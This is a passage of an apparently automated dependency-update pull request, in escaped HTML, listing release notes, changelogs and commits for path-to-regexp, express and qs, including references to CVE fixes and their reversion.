href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.18.2 to 4.22.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/releases\"\u003eexpress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.22.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!IMPORTANT]\u003cbr /\u003e\nThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cul\u003e\n\u003cli\u003eRelease: 4.22.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6934\"\u003eexpressjs/express#6934\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.22.0...v4.22.1\"\u003ehttps://github.com/expressjs/express/compare/4.22.0...v4.22.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.22.0\u003c/h2\u003e\n\u003ch2\u003eImportant: Security\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRefactor: improve readability by \u003ca href=\"https://github.com/sazk07\"\u003e\u003ccode\u003e@​sazk07\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6190\"\u003eexpressjs/express#6190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js@23.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6080\"\u003eexpressjs/express#6080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMethod functions with no path should error by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5957\"\u003eexpressjs/express#5957\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: updated github actions ci workflow by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6323\"\u003eexpressjs/express#6323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6336\"\u003eexpressjs/express#6336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackport: ci: add node.js 24 to test matrix by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6506\"\u003eexpressjs/express#6506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(4.x): wider range for query test skip by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6513\"\u003eexpressjs/express#6513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse tilde notation for certain dependencies by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6905\"\u003eexpressjs/express#6905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6909\"\u003eexpressjs/express#6909\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6919\"\u003eexpressjs/express#6919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.22.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6921\"\u003eexpressjs/express#6921\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.2...4.22.0\"\u003ehttps://github.com/expressjs/express/compare/4.21.2...4.22.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd funding field (v4) by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6065\"\u003eexpressjs/express#6065\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11 by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5956\"\u003eexpressjs/express#5956\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: bump path-to-regexp@0.1.12 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6209\"\u003eexpressjs/express#6209\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.2 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6094\"\u003eexpressjs/express#6094\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.1...4.21.2\"\u003ehttps://github.com/expressjs/express/compare/4.21.1...4.21.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBackport a fix for CVE-2024-47764 to the 4.x branch by \u003ca href=\"https://github.com/joshbuker\"\u003e\u003ccode\u003e@​joshbuker\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6029\"\u003eexpressjs/express#6029\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6031\"\u003eexpressjs/express#6031\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.0...4.21.1\"\u003ehttps://github.com/expressjs/express/compare/4.21.0...4.21.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/blob/v4.22.1/History.md\"\u003eexpress's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.22.1 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRevert security fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.22.0 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.2 / 2024-11-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.12\n\u003cul\u003e\n\u003cli\u003eFix backtracking protection\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11\n\u003cul\u003e\n\u003cli\u003eThrows an error on invalid path values\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.1 / 2024-10-08\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported a fix for \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-47764\"\u003eCVE-2024-47764\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.0 / 2024-09-11\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eres.location(\u0026quot;back\u0026quot;)\u003c/code\u003e and \u003ccode\u003eres.redirect(\u0026quot;back\u0026quot;)\u003c/code\u003e magic string\u003c/li\u003e\n\u003cli\u003edeps: serve-static@1.16.2\n\u003cul\u003e\n\u003cli\u003eincludes send@0.19.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: finalhandler@1.3.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.20.0 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: serve-static@0.16.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: send@0.19.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: body-parser@0.6.0\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eRemove link renderization in html while using \u003ccode\u003eres.redirect\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.10\n\u003cul\u003e\n\u003cli\u003eAdds support for named matching groups in the routes using a regex\u003c/li\u003e\n\u003cli\u003eAdds backtracking protection to parameters without regexes defined\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: encodeurl@~2.0.0\n\u003cul\u003e\n\u003cli\u003eRemoves encoding of \u003ccode\u003e\\\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, and \u003ccode\u003e^\u003c/code\u003e to align better with URL spec\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eDeprecate passing \u003ccode\u003eoptions.maxAge\u003c/code\u003e and \u003ccode\u003eoptions.expires\u003c/code\u003e to \u003ccode\u003eres.clearCookie\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/12fae14531a78f19a2caaa5d4f58d9b01eaf3194\"\u003e\u003ccode\u003e12fae14\u003c/code\u003e\u003c/a\u003e 4.22.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/5ddf311af32e772a77fd48b6266ce2f1ba330e1a\"\u003e\u003ccode\u003e5ddf311\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;sec: security patch for CVE-2024-51999\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/49744abd1120484fe64d7bde1cd3197c32523b6e\"\u003e\u003ccode\u003e49744ab\u003c/code\u003e\u003c/a\u003e 4.22.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6921\"\u003e#6921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6e97452f600a3b01719fbc5517d833c7646b0bb7\"\u003e\u003ccode\u003e6e97452\u003c/code\u003e\u003c/a\u003e sec: security patch for CVE-2024-51999\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6a23d34d652b9e69a4486d2a2a0dea54b9685fa5\"\u003e\u003ccode\u003e6a23d34\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6919\"\u003e#6919\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/8c12cdf93b89a4628b59179e3cc0722fc517d6b3\"\u003e\u003ccode\u003e8c12cdf\u003c/code\u003e\u003c/a\u003e deps: qs@6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6909\"\u003e#6909\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/7fea74fcf02764580f38f2a7f1932dfa54cddd90\"\u003e\u003ccode\u003e7fea74f\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6905\"\u003e#6905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/dac7a0475a99e9dfc57b3b8e6d5bdf52813f1944\"\u003e\u003ccode\u003edac7a04\u003c/code\u003e\u003c/a\u003e chore: wider range for query test skip (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6513\"\u003e#6513\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/997919b48879bbd53171c3b4e5dd1b04ad139241\"\u003e\u003ccode\u003e997919b\u003c/code\u003e\u003c/a\u003e ci: add node.js 24 to test matrix (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6506\"\u003e#6506\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/36fb59c6c7d9dfca0b08dfeafb5b6e4a249234a1\"\u003e\u003ccode\u003e36fb59c\u003c/code\u003e\u003c/a\u003e fix(ci): reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6336\"\u003e#6336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/express/compare/4.18.2...v4.22.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for express since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.11.1 to 6.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003ethrowOnParameterLimitExceeded\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/517\"\u003e#517\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: use \u003ccode\u003eutils.combine\u003c/code\u003e more\u003c/li\u003e\n\u003cli\u003e[patch] \u003ccode\u003eparse\u003c/code\u003e: add explicit \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e default\u003c/li\u003e\n\u003cli\u003e[actions] use shared action; re-add finishers\u003c/li\u003e\n\u003cli\u003e[meta] Fix changelog formatting bug\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003eside-channel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003ehas-bigints\u003c/code\u003e, \u003ccode\u003ehas-proto\u003c/code\u003e, \u003ccode\u003ehas-symbols\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.3\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e[Fix] fix regressions from robustness refactor\n[actions] update reusable workflows\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: avoid a crash when a \u003ccode\u003efilter\u003c/code\u003e key is \u003ccode\u003enull\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eutils.merge\u003c/code\u003e: functions should not be stringified into keys\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: avoid a crash with interpretNumericEntities: true, comma: true, and iso charset\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: ensure a non-string \u003ccode\u003efilter\u003c/code\u003e does not crash\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003e__proto__\u003c/code\u003e syntax instead of \u003ccode\u003eObject.create\u003c/code\u003e for null objects\u003c/li\u003e\n\u003cli\u003e[Refactor] misc cleanup\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/bdcf0c7f82387c18ac8fabfccd2f440645cef47b\"\u003e\u003ccode\u003ebdcf0c7\u003c/code\u003e\u003c/a\u003e v6.14.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/294db90c812ddbe7d7a35d5687c505fd21a2d6a2\"\u003e\u003ccode\u003e294db90\u003c/code\u003e\u003c/a\u003e [readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5c308e5516c270a78caa6f278465914090f91ec6\"\u003e\u003ccode\u003e5c308e5\u003c/code\u003e\u003c/a\u003e [readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/6addf8cf738d529c54d91f6f3ffb6c1be91bbfdc\"\u003e\u003ccode\u003e6addf8c\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/cfc108f662326d6ab540f3545ef0b832baf83cdf\"\u003e\u003ccode\u003ecfc108f\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/`pars...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/febb64442a80e49200211fa38d3c96b58024ac77\"\u003e\u003ccode\u003efebb644\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when `thr...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482\"\u003e\u003ccode\u003ef6a7abf\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e\u003ca 